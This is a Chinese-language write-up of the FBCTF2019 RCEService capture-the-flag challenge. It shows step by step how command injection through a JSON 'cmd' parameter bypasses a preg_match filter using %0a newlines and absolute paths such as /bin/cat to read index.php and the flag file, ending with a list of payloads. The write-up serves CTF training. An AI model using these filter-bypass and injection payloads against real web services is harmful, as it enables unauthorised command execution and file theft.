练[FBCTF2019]RCEService

[FBCTF2019]RCEService

文章目录

掌握知识

json字符串格式,命令失效(修改环境变量)--绝对路径使用linux命令,%0a绕过preg_match函数,代码审计

解题思路

  1. 打开题目链接,发现可以通过json格式传递命令进行命令执行,但是不知道json的键名,输入ls显示无法识别,查看源代码后发现该输入框的name信息为cmd,确定这就是键,构建paylaod{"cmd":"ls"},抓包查看成功回显信息
  1. 发现命令正常执行,准备查看根目录的文件,由于是get传参,所以空格先编码为%20,但是发现回显hacking,经过测试发现是对/进行了过滤
  1. 既然不能使用/,那就直接使用cat命令查看一下index.php文件,发现还是不行,尝试更改cat的格式进行绕过,发现还是不行。
  1. 仔细想想,既然存在过滤,多半碰到的函数都是preg_match,该函数可以通过换行符%0a和数组进行绕过,因为该函数只会匹配第一行数据,除非设置了参数。所以默认为preg_match函数过滤,构建paylaod{%0a"cmd":"cat%20index.php"%0a}。发现还是不行,但是可以执行ls /命令了,证明前面猜测没问题,还绕过来了过滤
  1. 那为什么cat命令还不行执行呢,都已经绕过了过滤。其实在没有限制的情况下命令还不能执行,只能是该命令被屏蔽了,但是使用其他查看文件的命令也都不可以。
  2. 那可能就是环境变量被更改了,需要使用命令的绝对路径来执行,也就是/bin/cat。再次构建paylaod{%0a"cmd":"/bin/cat%20index.php"%0a}。成功回显了文件内容,还得到了一个病毒提示...
  1. 发现过滤函数确实是preg_match,代码的一开始就将环境变量修改了,既然flag不在根目录下,那很可能就在这个环境变量中,查看环境变量目录结构,发现了flag目录,cat命令直接拿下flag

关键paylaod

php 复制代码
{"cmd":"ls"}

{"cmd":"ls%20/"}

{"cmd":"cat%20index.php"}

{%0a"cmd":"ls%20/"%0a}

{%0a"cmd":"cat%20index.php"%0a}

{%0a"cmd":"/bin/cat%20index.php"%0a}

{%0a"cmd":"ls%20/home/rceserive"%0a}

{%0a"cmd":"/bin/cat%20/home/rceserive/flag"%0a}
相关推荐
老虎062714 分钟前
黑马点评学习笔记11(Redission)
笔记·学习
YJlio36 分钟前
ListDLLs & Handle 学习笔记(8.11):谁注入了 DLL?谁占着文件不放?一篇教你全搞定
网络·笔记·学习
蒙奇D索大1 小时前
【算法】回溯算法精讲:从深度优先搜索到剪枝优化
经验分享·笔记·算法·深度优先·剪枝·改行学it
饮长安千年月1 小时前
玄机-第八章 内存马分析-java02-shiro
数据库·安全·web安全·网络安全·应急响应
爱奥尼欧1 小时前
【Linux笔记】网络部分——NAT-代理-网络穿透
linux·网络·笔记
Fnetlink11 小时前
推动“AI+ 网络安全”深度融合与创新发展
人工智能·安全·web安全
一个平凡而乐于分享的小比特2 小时前
UCOS-III笔记(七)
笔记·ucosiii
小马爱打代码3 小时前
Java学习笔记:注解详解
java·笔记·学习
Z3r4y4 小时前
【代码审计】迅睿CMS V4.6.2 Phar反序列化 RCE
web安全·代码审计·phar反序列化·迅睿cms
QT 小鲜肉4 小时前
【C++基础与提高】第十一章:面向对象编程进阶——继承与多态
java·linux·开发语言·c++·笔记·qt